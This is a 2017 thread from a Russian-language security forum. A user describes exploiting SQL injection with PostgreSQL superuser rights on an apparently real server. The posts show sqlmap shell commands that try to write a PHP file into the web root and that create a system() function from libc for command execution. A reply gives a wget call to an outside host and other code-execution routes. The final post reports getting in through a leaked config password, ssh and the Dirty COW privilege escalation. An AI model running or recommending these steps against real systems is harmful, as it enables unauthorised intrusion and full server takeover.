HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Перезагрузить страницу Postgres Injection + PRIV
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 24.03.2017, 23:20
ACat
Guest
Сообщений: n/a
Провел на форуме:
60408

Репутация: 0
По умолчанию
Всем доброго времени суток.

Решил, что эта ситуация тянет на отдельный топик :3

И так, задача:

linux Debian 4.4.5-8, 64-bit

Apache/2.2.16 (Debian)

PostgreSQL 8.4.13

Код:
Code:
SELECT usename, usecreatedb, usesuper, usecatupd FROM pg_user
postgres, true, true, true

Код:
Code:
SELECT mycol FROM mytable limit 1
''

Код:
Code:
sql-shell> COPY mytable (mycol) TO '/var/www/landing/Utils/Common/vendor/php-curl-class/php-curl-class/1.php';
[13:12:07] [INFO] fetching SQL query output: 'COPY mytable (mycol) TO '/var/www/landing/Utils/Common/vendor/php-curl-class/php-curl-class/1.php''
[13:12:07] [INFO] retrieving the length of query output
[13:12:07] [INFO] retrieved:
[13:12:08] [INFO] retrieved:
sql-shell>
Not Found

The requested URL /landing/Utils/Common/vendor/php-curl-class/php-curl-class/1.php was not found on this server.

Смею предположить, что нету прав на запись от юзера базы данных в папочки юзера веб-сервера.

Пробуем code exec:

Код:
Code:
sql-shell> CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT;
CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT;:  'NULL'
sql-shell> SELECT system('id');
[13:17:35] [INFO] fetching SQL SELECT statement query output: 'SELECT system("id")'
[13:17:36] [INFO] retrieving the length of query output
[13:17:36] [INFO] retrieved:
[13:17:36] [INFO] retrieved:
sql-shell>
Еще на сервере в открытом доступе лежат php-curl-class если это может как-то помочь.
 
Ответить с цитированием

  #2  
Старый 24.03.2017, 23:55
ACat
Guest
Сообщений: n/a
Провел на форуме:
60408

Репутация: 0
По умолчанию
ап
 
Ответить с цитированием

  #3  
Старый 28.03.2017, 23:34
ACat
Guest
Сообщений: n/a
Провел на форуме:
60408

Репутация: 0
По умолчанию
Хлопцi, шо никто не поможет?
 
Ответить с цитированием

  #4  
Старый 30.03.2017, 02:41
crlf
Guest
Сообщений: n/a
Провел на форуме:
169212

Репутация: 441
По умолчанию
Цитата:
Сообщение от None  
SELECT system('wget yourhost.com');
Если в логах пусто, то возможно либы нет на месте или нет wget-а

Попробуй /lib/x86_64-linux-gnu/libc.so.6 или /lib32/libc.so.6 . Ещё немного. И не факт, что этот метод работает на этой версии

По первому случаю, попробуй в /tmp выгрузить и залить обратно, там ясно будет.

Так же есть варианты с plpython, plperl и UDF, нужно тестить.
 
Ответить с цитированием

  #5  
Старый 02.04.2017, 04:55
ACat
Guest
Сообщений: n/a
Провел на форуме:
60408

Репутация: 0
По умолчанию
Спасибо за ответы, как я и предпологал не было прав на запись.

Решилось прикольным образом: бэкап файл с конфигом и паролем от юзера базы данных, ssh, dirty cow.
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ